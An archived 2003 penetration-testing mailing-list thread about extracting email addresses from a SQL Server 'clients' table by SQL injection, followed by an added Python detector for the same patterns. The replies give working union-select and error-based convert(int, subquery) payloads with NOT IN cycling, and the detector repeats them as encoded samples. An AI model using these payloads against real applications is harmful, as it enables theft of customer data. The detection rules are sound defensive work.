Hello dude,

You can't use "union" or "having" when the original query looks like "select * from table" or "select image from table", but this disadvantage can be bypassed easily when using convert(int,(your injected query)). Just put an " ' and convert(int,(injected query)), all data is in your hand :D.

On Thursday 13 February 2003 01:51 am, Panos Dimitriou wrote:
> One solution is to try to find the exact columns to perform a union
> select by replacing 1s with 'foo' when you get the error message "
> operand type clash: text is incompatible with int"
>
> Example:
>
> ') union all select sum(email),1,1,1.... from clients--
> until you get: operand type clash: text is incompatible with int Then
> change the last 1 with 'foo' and continue with 1s, and so on and so
> forth.
>
> The other solution is to try to get all the data through error cycling,
> as you already tried and use NOT IN as follows:
>
> ' %2b convert(int, (SELECT max(email) FROM clients WHERE email not in
> ('anonat_private','othermailat_private',...))) %2b '
>
> I hope this works
>
> Panos Dimitriou
> Director, MSS
>
>
> -----Original Message-----
> From: Daniel Savi [mailto:dssat_private]
> Sent: Wednesday, February 12, 2003 7:49 PM
> To: pen-testat_private
> Subject: SQL injection - get more values
>
>
>
> Hi :)
>
> i'm trying to get some info from clients table and email field....
>
> i try this param into gubpage.asp?=...
> ') union select sum(email) from clients--
> and got error about all queries needed...so, i tried to solve with
> ') union select sum(email),1,1,1.... from clients--
> until i get: operand type clash: text is incompatible with int
>
> i found this answer into this forum (thanks :)), was:
> ' %2b convert(int, (SELECT email FROM clients WHERE email > 'a')) %2b '
>
> i got this:
> Syntax error converting the varchar value 'anonat_private' to a column of
> data type int
>
> Now, my problem: How can i get other e-mail from table knowing one valid
> value?
>
> i try this
> ' %2b convert(int, (SELECT email FROM clients WHERE email >
> 'anonat_private')) %2b '
>
> but no success
>
> i think i can use NOT iN, but not sure how to use with convert...
>
> Any tips are welcome!
>
> Thanks

----------------------------------------------------------------------------
This list is provided by the SecurityFocus Security Intelligence Alert (SIA)
Service. For more information on SecurityFocus' SIA service which
automatically alerts you to the latest security vulnerabilities please see:
https://alerts.securityfocus.com/
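
A defender-side check for the two techniques discussed in this thread, as an added example that is not part of the original messages: it flags requests carrying a `convert(int,(select ...` or `union select` shape and, separately, responses that leak the SQL Server error texts quoted above, which is what makes the error-cycling approach work. The parameter names, rule names and sample request/response pairs are constructed for illustration.

```python
import re
from urllib.parse import unquote_plus

# Request-side rules: the two injection shapes quoted in the thread.
REQUEST_RULES = {
    "convert_int_subquery": re.compile(r"convert\s*\(\s*int\s*,\s*\(\s*select\b", re.I),
    "union_select": re.compile(r"\bunion\s+(?:all\s+)?select\b", re.I),
}
# Response-side rules: the database error texts that must never reach a client.
RESPONSE_RULES = {
    "conversion_error_leak": re.compile(
        r"syntax error converting the \w+ value '[^']*' to a column of data type int", re.I),
    "type_clash_leak": re.compile(r"operand type clash: \w+ is incompatible with \w+", re.I),
}

def normalize(raw):
    """URL-decode twice (to catch double encoding) and collapse whitespace."""
    return re.sub(r"\s+", " ", unquote_plus(unquote_plus(raw)))

def classify(query_string, response_body):
    """Return the sorted names of every rule that fired for one request/response pair."""
    query = normalize(query_string)
    body = re.sub(r"\s+", " ", response_body)  # error text may wrap across lines
    hits = [name for name, rx in REQUEST_RULES.items() if rx.search(query)]
    hits += [name for name, rx in RESPONSE_RULES.items() if rx.search(body)]
    return sorted(hits)

# Constructed request/response pairs (not real traffic); "id" and "q" are hypothetical.
SAMPLES = [
    ("id=42", "<html>ok</html>"),
    ("id=%27%20%2b%20convert(int,%20(SELECT%20email%20FROM%20clients))%20%2b%20%27",
     "Syntax error converting the varchar value 'user@example.test' to a column of\n"
     "data type int"),
    ("id=%27)%20union%20all%20select%20sum(email),1,1%20from%20clients--",
     "Operand type clash: text is incompatible with int"),
    ("q=student+union+elections", "<html>results</html>"),
]

if __name__ == "__main__":
    for query_string, response_body in SAMPLES:
        print(query_string[:40], "->", classify(query_string, response_body))
```

A response-side hit means the application is returning raw database errors to the client; the fix for that is generic error pages, and the fix for the request-side shapes is parameterized queries rather than string concatenation.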
This archive was generated by hypermail 2b30 : Thu Feb 13 2003 - 07:05:57 PST